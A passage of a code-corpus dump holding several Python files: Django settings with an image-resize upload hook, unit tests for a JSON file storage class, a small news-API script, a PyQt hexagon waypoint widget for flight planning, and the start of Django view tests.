"line_number": 103, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 107, "usage_type": "call"}, {"api_name": "libs.calculators.utils.aggregate_purchases", "line_number": 125, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 134, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 137, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 137, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 151, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 153, "usage_type": "call"}, {"api_name": "libs.NAP_DIVIDEND_TAX", "line_number": 153, "usage_type": "argument"}, {"api_name": "libs.RECEIVED_DIVIDEND_ACTIVITY_TYPES", "line_number": 174, "usage_type": "name"}, {"api_name": "libs.TAX_DIVIDEND_ACTIVITY_TYPES", "line_number": 175, "usage_type": "name"}, {"api_name": "libs.RECEIVED_DIVIDEND_ACTIVITY_TYPES", "line_number": 182, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 183, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.TAX_DIVIDEND_ACTIVITY_TYPES", "line_number": 194, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 196, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "129204609", "text": "\"\"\"\nDjango settings for lubnik project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'lubnik.urls'\n\nWSGI_APPLICATION = 'lubnik.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'cs'\n\nTIME_ZONE = 'Europe/Prague'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(BASE_DIR, 'assets'),\n)\n\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\nTEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n )\nGRAPPELLI_ADMIN_TITLE = 'lubnik.cz - administrace'\n\nFILEBROWSER_VERSIONS_BASEDIR = '_versions/'\nFILEBROWSER_VERSIONS = {\n 'admin_thumbnail': {'verbose_name': 'Admin Thumbnail', 'width': 60, 'height': 60, 'opts': 'crop'},\n 'thumbnail': {'verbose_name': 'Thumbnail', 'width': 200, 'height': 200, 'opts': 'crop'},\n 'medium_thumbnail': {'verbose_name': 'Thumbnail medium', 'width': 300, 'height': 250, 'opts': 'crop'},\n 'large_thumbnail': {'verbose_name': 'Thumbnail large', 'width': 500, 'height': 400, 'opts': 'crop'},\n 'small': {'verbose_name': 'Small', 'width': 140, 'height': 93, 'opts': ''},\n 'medium': {'verbose_name': 'Medium', 'width': 300, 'height': 225, 'opts': ''},\n 'big': {'verbose_name': 'Big', 'width': 460, 'height': '', 'opts': ''},\n 'large': {'verbose_name': 'Large', 'width': 640, 'height': '', 'opts': ''},\n}\nFILEBROWSER_NORMALIZE_FILENAME = True\n\nFILEBROWSER_OVERWRITE_EXISTING = False\n\nFILEBROWSER_EXTENSIONS = {\n 'Folder': [''],\n 'Image': ['.jpg', '.jpeg', '.gif', '.png', '.tif', '.tiff'],\n 'Document': ['.pdf', '.doc', '.rtf', '.txt', '.xls', '.csv', '.xlsx', '.docx'],\n 'Video': ['.mov', '.wmv', '.mpeg', '.mpg', '.avi', '.rm'],\n 'Audio': ['.mp3', '.mp4', '.wav', '.aiff', '.midi', '.m4p']\n }\n\nfrom filebrowser import signals\n\n\ndef post_upload_callback(sender, **kwargs):\n \"\"\"\n Receiver function called each time an upload has finished.\n \"\"\"\n if kwargs['file'].filetype == 'Image':\n if kwargs['file'].height > 1200 or kwargs['file'].width > 1920:\n resize_image(kwargs['file'].path_full)\n\nsignals.filebrowser_post_upload.connect(post_upload_callback)\n\n\ndef resize_image(image_path):\n from PIL import Image\n\n large_size = (1920, 1200)\n im = Image.open(image_path)\n\n image_w, image_h = im.size\n aspect_ratio = image_w / float(image_h)\n new_height = int(large_size[0] / aspect_ratio)\n\n if new_height < 1200:\n final_width = large_size[0]\n final_height = new_height\n else:\n final_width = int(aspect_ratio * large_size[1])\n final_height = large_size[1]\n\n resized_image = im.resize((final_width, final_height), Image.ANTIALIAS)\n\n # imaged.show()\n resized_image.save(image_path, quality=80)\n", "sub_path": "lubnik/settings/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5188, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "filebrowser.signals.filebrowser_post_upload.connect", "line_number": 138, "usage_type": "call"}, {"api_name": "filebrowser.signals.filebrowser_post_upload", "line_number": 138, "usage_type": "attribute"}, {"api_name": "filebrowser.signals", "line_number": 138, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 145, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 158, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 158, "usage_type": "name"}]} +{"seq_id": "551465188", "text": "#!/usr/bin/python3\n\"\"\"Unittest for file_storage after task 5.\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nimport json\nimport os\nfrom shutil import copy2\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\"Tests `FileStorage` class.\n \"\"\"\n __objects_backup = FileStorage._FileStorage__objects\n json_file = FileStorage._FileStorage__file_path\n json_file_backup = FileStorage._FileStorage__file_path + '.bup'\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Setup for all tests in module.\n \"\"\"\n FileStorage._FileStorage__objects = dict()\n if os.path.exists(cls.json_file):\n copy2(cls.json_file, cls.json_file_backup)\n os.remove(cls.json_file)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Teardown after all tests in module.\n \"\"\"\n FileStorage._FileStorage__objects = cls.__objects_backup\n if os.path.exists(cls.json_file_backup):\n copy2(cls.json_file_backup, cls.json_file)\n os.remove(cls.json_file_backup)\n\n def tearDown(self):\n \"\"\"Any needed cleanup, per test method.\n \"\"\"\n try:\n del (fs1, fs2, fs3, fs4)\n except NameError:\n pass\n try:\n del (bm1, bm2, bm3, bm4)\n except NameError:\n pass\n FileStorage._FileStorage__objects = dict()\n if os.path.exists(type(self).json_file):\n os.remove(type(self).json_file)\n\n def test_FileStorage(self):\n \"\"\"Task 5. Store first object\n Tests instantiation of class `FileStorage` and use in models__init__.\n \"\"\"\n # TypeError: any args\n self.assertRaises(TypeError, FileStorage, 'arg')\n # no args\n fs1 = FileStorage()\n self.assertIsInstance(fs1, FileStorage)\n # Normal use: as `storage` attr in models.__init__, imprtd to BaseModel\n bm1 = BaseModel()\n from models import storage\n self.assertIsInstance(storage, FileStorage)\n\n def test___file_path(self):\n \"\"\"Task 5. Store first object\n Tests private class attribute `__file_path`.\n \"\"\"\n fs1 = FileStorage()\n # new FileStorage object has __file_path\n self.assertIsNotNone(fs1._FileStorage__file_path)\n # __file_path is a string\n __file_path = fs1._FileStorage__file_path\n self.assertIsInstance(__file_path, str)\n # __file_path ends in '.json'\n self.assertEqual(__file_path[-5:], '.json')\n # __file_path is writable (permissions)\n content = 'Test text 0123456789abcdefghijklmnopqrstuvwxyz'\n with open(__file_path, 'w', encoding='utf-8') as file:\n file.write(content)\n with open(__file_path, 'r', encoding='utf-8') as file:\n self.assertEqual(content, file.read())\n\n def test___objects(self):\n \"\"\"Task 5. Store first object\n Tests private class attribute `__objects`.\n \"\"\"\n fs1 = FileStorage()\n # new FileStorage object has __objects\n self.assertIsNotNone(fs1._FileStorage__objects)\n # __objects is a dict\n __objects = fs1._FileStorage__objects\n self.assertIsInstance(__objects, dict)\n # __objects is empty to start\n self.assertEqual(len(__objects), 0)\n # __objects can store item with key:'.id', value: obj\n bm1 = BaseModel()\n bm1_dict = bm1.to_dict()\n bm1__objects_key = bm1_dict['__class__'] + '.' + bm1.id\n __objects[bm1__objects_key] = bm1\n self.assertIn(bm1__objects_key, __objects)\n self.assertEqual(__objects[bm1__objects_key], bm1)\n\n def test_all(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `all()`.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.all, 'arg')\n # Normal use: no args\n fs1__objects = fs1.all()\n # returns __objects\n self.assertEqual(fs1._FileStorage__objects, fs1__objects)\n\n def test_new(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `new()`. See also\n TestBaseModel.test_BaseModel.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: no args\n self.assertRaises(TypeError, fs1.new)\n # TypeError: 2+ args\n self.assertRaises(TypeError, fs1.new, 'arg1', 'arg2')\n # called in BaseModel.__init__, to include new BM obj in __objects\n bm1 = BaseModel()\n from models import storage\n self.assertIn(bm1, storage._FileStorage__objects.values())\n # KeyError: __dict__ of arg obj doesn't include `id`\n # .id not string\n # Normal use: 1 arg of obj whose __dict__ includes `id`\n # cls.__objects updated with key:'.id', value: obj\n # key:'.id' already in self.__objects\n\n def test_save(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `save()`. See also\n TestBaseModel.test_save()\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.save, 'arg')\n # Correct use: no args\n fs1.save()\n # Normal use: called by BaseModel.save(), writes to __file_path\n self.assertTrue(os.path.isfile(fs1._FileStorage__file_path))\n # writes to __file_path a JSON serialized string of __objects\n with open(fs1._FileStorage__file_path, encoding='utf-8') as file:\n contents = file.read()\n self.assertEqual(json.loads(contents), fs1._FileStorage__objects)\n\n def test_reload(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `reload()`.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.reload, 'arg')\n # Normal use: no args, file contains string compatible with json.load()\n fs1.save()\n self.assertTrue(os.path.isfile(fs1._FileStorage__file_path))\n fs1.reload()\n with open(fs1._FileStorage__file_path, encoding='utf-8') as file:\n self.assertEqual(json.load(file), fs1._FileStorage__objects)\n # if __file_path does not exist, do nothing, no exception raised\n fs2 = FileStorage()\n __objects_pre_reload = fs2._FileStorage__objects\n fs2.save()\n os.remove(fs2._FileStorage__file_path)\n fs2.reload()\n self.assertEqual(fs2._FileStorage__objects, __objects_pre_reload)\n # file exists already but doesn't contain JSON format string\n __file_path = fs2._FileStorage__file_path\n content = 'Test text 0123456789abcdefghijklmnopqrstuvwxyz'\n with open(__file_path, 'w+', encoding='utf-8') as file:\n file.write(content)\n print(file.read())\n self.assertRaises(ValueError, fs2.reload)\n # KeyError: object in .json file has no `id` attribute\n # cls.__objects updated with key:'.id', value: obj\n # key:'.id' already in self.__objects\n\n def test_models___init__1(self):\n \"\"\"Task 5. Store first object\n Tests `models.__init__` for its use of `FileStorage` on instantiation\n of subclasses.\n Separated into 2 test methods to run `models.__init__` once per method.\n \"\"\"\n bm1 = BaseModel()\n # `storage` attr created\n from models import storage\n self.assertIsNotNone(storage)\n # `storage` is a `FileStorage` object\n self.assertIsInstance(storage, FileStorage)\n\n def test_models___init__2(self):\n \"\"\"Task 5. Store first object\n Tests `models.__init__` for its use of `FileStorage` on instantiation\n of subclasses.\n\n Separated into 2 test methods to run `models.__init__` once per method.\n \"\"\"\n\n pass\n", "sub_path": "tests/test_models/test_engine/test_file_storage.py", "file_name": "test_file_storage.py", "file_ext": "py", "file_size_in_byte": 7888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 14, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__file_path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 15, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__file_path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 16, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 25, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 33, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 34, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 47, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 49, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 56, "usage_type": "argument"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 58, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 59, "usage_type": "argument"}, {"api_name": "models.base_model.BaseModel", "line_number": 61, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 63, "usage_type": "argument"}, {"api_name": "models.storage", "line_number": 63, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 69, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 88, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 97, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 108, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 121, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 127, "usage_type": "call"}, {"api_name": "models.storage._FileStorage__objects.values", "line_number": 129, "usage_type": "call"}, {"api_name": "models.storage._FileStorage__objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.storage", "line_number": 129, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 151, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 165, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 167, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 170, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 190, "usage_type": "call"}, {"api_name": "models.storage", "line_number": 193, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 195, "usage_type": "argument"}, {"api_name": "models.storage", "line_number": 195, "usage_type": "name"}]} +{"seq_id": "120393765", "text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/04/24 22:25\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : loads_1.py\n# @notice :\n\n\nimport requests\nimport json\n\n\ndef main():\n resp = requests.get('http://api.tianapi.com/guonei/?key=APIKey&num=10')\n data_model = json.loads(resp.text)\n for news in data_model['newslist']:\n print(news['title'])\n\n\nif __name__ == '__main__':\n main()", "sub_path": "python_100_days/day01_15/loads_1.py", "file_name": "loads_1.py", "file_ext": "py", "file_size_in_byte": 423, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "412360892", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\n mslib.msui.hexagon_dockwidget\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n Control widget to configure remote sensing overlays.\n\n This file is part of MSS.\n\n :copyright: Copyright 2016-2017 Joern Ungermann, Stefan Ensmann\n :copyright: Copyright 2016-2023 by the MSS team, see AUTHORS.\n :license: APACHE-2.0, see LICENSE for details.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport numpy as np\nimport logging\n\nfrom PyQt5 import QtWidgets\nfrom mslib.msui.qt5 import ui_hexagon_dockwidget as ui\nfrom mslib.msui import flighttrack as ft\nfrom mslib.utils.coordinate import rotate_point\nfrom mslib.utils.config import config_loader\n\n\nclass HexagonException(Exception):\n def __init__(self, error_string):\n logging.debug(\"%s\", error_string)\n\n\ndef create_hexagon(center_lat, center_lon, radius, angle=0., clockwise=True):\n coords = (radius, 0.)\n coords_cart = [rotate_point(coords, angle=_a + angle) for _a in range(0, 361, 60)]\n if not clockwise:\n coords_cart.reverse()\n coords_sphere = [\n (center_lat + (_x / 110.),\n center_lon + (_y / (110. * np.cos(np.deg2rad((_x / 110.) + center_lat)))))\n for _x, _y in coords_cart]\n return coords_sphere\n\n\nclass HexagonControlWidget(QtWidgets.QWidget, ui.Ui_HexagonDockWidget):\n \"\"\"\n This class implements the remote sensing functionality as dockable widget.\n \"\"\"\n\n def __init__(self, parent=None, view=None):\n \"\"\"\n Arguments:\n parent -- Qt widget that is parent to this widget.\n view -- reference to mpl canvas class\n \"\"\"\n super().__init__(parent)\n self.setupUi(self)\n self.view = view\n if self.view:\n self.view.tableWayPoints.selectionModel().selectionChanged.connect(self.on_selection_changed)\n self.on_selection_changed(None)\n\n self.dsbHexgaonRadius.setValue(200)\n\n self.pbAddHexagon.clicked.connect(self._add_hexagon)\n self.pbRemoveHexagon.clicked.connect(self._remove_hexagon)\n\n def on_selection_changed(self, index):\n \"\"\"\n Disables add and remove when multiple rows are selected\n \"\"\"\n enable = len(self.view.tableWayPoints.selectionModel().selectedRows()) <= 1\n self.pbAddHexagon.setEnabled(enable)\n self.pbRemoveHexagon.setEnabled(enable)\n\n def _get_parameters(self):\n return {\n \"center_lon\": self.dsbHexagonLongitude.value(),\n \"center_lat\": self.dsbHexagonLatitude.value(),\n \"radius\": self.dsbHexgaonRadius.value(),\n \"angle\": self.dsbHexagonAngle.value(),\n \"direction\": self.cbClock.currentText(),\n }\n\n def _add_hexagon(self):\n table_view = self.view.tableWayPoints\n waypoints_model = self.view.waypoints_model\n params = self._get_parameters()\n\n if params[\"radius\"] < 0.01:\n QtWidgets.QMessageBox.warning(\n self, \"Add hexagon\", \"You cannot create a hexagon with zero radius!\")\n return\n points = create_hexagon(params[\"center_lat\"], params[\"center_lon\"], params[\"radius\"],\n params[\"angle\"], params[\"direction\"] == \"clockwise\")\n index = table_view.currentIndex()\n if not index.isValid():\n row = 0\n flightlevel = config_loader(dataset=\"new_flighttrack_flightlevel\")\n else:\n row = index.row() + 1\n flightlevel = waypoints_model.waypoint_data(row - 1).flightlevel\n waypoints = []\n for i, point in enumerate(points):\n waypoints.append(\n ft.Waypoint(lon=float(point[1]), lat=float(point[0]),\n flightlevel=float(flightlevel), comments=f\"Hexagon {(i + 1):d}\"))\n waypoints_model.insertRows(row, rows=len(waypoints), waypoints=waypoints)\n index = waypoints_model.index(row, 0)\n table_view.setCurrentIndex(index)\n table_view.resizeRowsToContents()\n\n def _remove_hexagon(self):\n table_view = self.view.tableWayPoints\n waypoints_model = self.view.waypoints_model\n\n index = table_view.currentIndex()\n\n try:\n if not index.isValid():\n raise HexagonException(\"A waypoint of the hexagon must be selected.\")\n row = index.row()\n comm = str(waypoints_model.waypoint_data(row).comments)\n if len(comm) == 9 and comm.startswith(\"Hexagon \"):\n if (len(waypoints_model.all_waypoint_data()) - 7) < 2: # = 3 waypoints + 7 hexagon points\n raise HexagonException(\"Cannot remove hexagon, the flight track needs to consist \"\n \"of at least two points.\")\n idx = int(comm[-1])\n row_min = row - (idx - 1)\n row_max = row + (7 - idx)\n if row_min < 0 or row_max > len(waypoints_model.all_waypoint_data()):\n raise HexagonException(\"Cannot remove hexagon, hexagon is not complete \"\n f\"min, max = {row_min:d}, {row_max:d}\")\n else:\n found_one = False\n for i in range(0, row_max - row_min):\n if str(waypoints_model.waypoint_data(row_min + i).comments) != f\"Hexagon {(i + 1):d}\":\n found_one = True\n break\n if found_one:\n raise HexagonException(\"Cannot remove hexagon, hexagon comments are not found in all \"\n f\"points (min, max = {row_min:d}, {row_max:d})\")\n else:\n sel = QtWidgets.QMessageBox.question(\n None, \"Remove hexagon\",\n f\"This will remove waypoints {row_min:d}-{row_max:d}. Continue?\",\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n QtWidgets.QMessageBox.Yes)\n if sel == QtWidgets.QMessageBox.Yes:\n waypoints_model.removeRows(row_min, rows=7)\n else:\n raise HexagonException(\"Cannot remove hexagon, please select a hexagon \"\n \"waypoint ('Hexagon x' in comments field)\")\n except HexagonException as ex:\n QtWidgets.QMessageBox.warning(self, \"Remove hexagon\", str(ex))\n", "sub_path": "mslib/msui/hexagon_dockwidget.py", "file_name": "hexagon_dockwidget.py", "file_ext": "py", "file_size_in_byte": 6982, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.debug", "line_number": 39, "usage_type": "call"}, {"api_name": "mslib.utils.coordinate.rotate_point", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 54, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "mslib.msui.qt5.ui_hexagon_dockwidget.Ui_HexagonDockWidget", "line_number": 54, "usage_type": "attribute"}, {"api_name": "mslib.msui.qt5.ui_hexagon_dockwidget", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 100, "usage_type": "name"}, {"api_name": "mslib.utils.config.config_loader", "line_number": 108, "usage_type": "call"}, {"api_name": "mslib.msui.flighttrack.Waypoint", "line_number": 115, "usage_type": "call"}, {"api_name": "mslib.msui.flighttrack", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 153, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 153, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 153, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 156, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 156, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 157, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 158, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 158, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 164, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 164, "usage_type": "name"}]} +{"seq_id": "574270763", "text": "#! /usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\ndansMonPanier app\nFile to run tests.\n\"\"\"\n\nfrom .views import *\nfrom .models import *\nfrom .forms import UserForm\nfrom datetime import datetime\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom django.test import RequestFactory, TestCase\nfrom django.urls import reverse\n\n\nclass SimpleViewTest(TestCase):\n \"\"\"\n This class performs simple view tests\n through status code and pieces of content\n \"\"\"\n def test_index(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Trouvez un produit de substitution\")\n\n def test_legal(self):\n response = self.client.get(reverse('legal'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Directeur de publication\")\n\n def test_signin(self):\n response = self.client.get(reverse('signin'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Créez votre espace\")\n\n def test_user_login(self):\n response = self.client.get(reverse('user_login'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Accédez à votre espace\")\n\n def test_user_logout(self):\n response = self.client.get(reverse('user_logout'))\n self.assertEqual(response.status_code, 302)\n\n def test_my_favorites(self):\n response = self.client.get(reverse('my_favorites'))\n self.assertEqual(response.status_code, 302)\n\n def test_my_profile(self):\n response = self.client.get(reverse('my_profile'))\n self.assertEqual(response.status_code, 302)\n\n\nclass AppDataTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"\n This method creates temporary data\n for the needs of tests.\n \"\"\"\n Category.objects.create(\n id=0,\n category='pains',\n items=1,\n img_link='/img/pains.jpg'\n )\n\n Category.objects.create(\n id=1,\n category='beurres',\n items=1,\n img_link='/img/beurres.jpg'\n )\n\n Food.objects.create(\n id=0,\n category='pains',\n created=datetime.now(),\n code='0000000000000',\n name='Bread test',\n brands='Fake bread brand',\n stores='Carrefour',\n url='https://foo.bar',\n bio='TRUE',\n eco_packaging='TRUE',\n fsc='FALSE',\n utz='FALSE',\n palm_oil_free='FALSE',\n 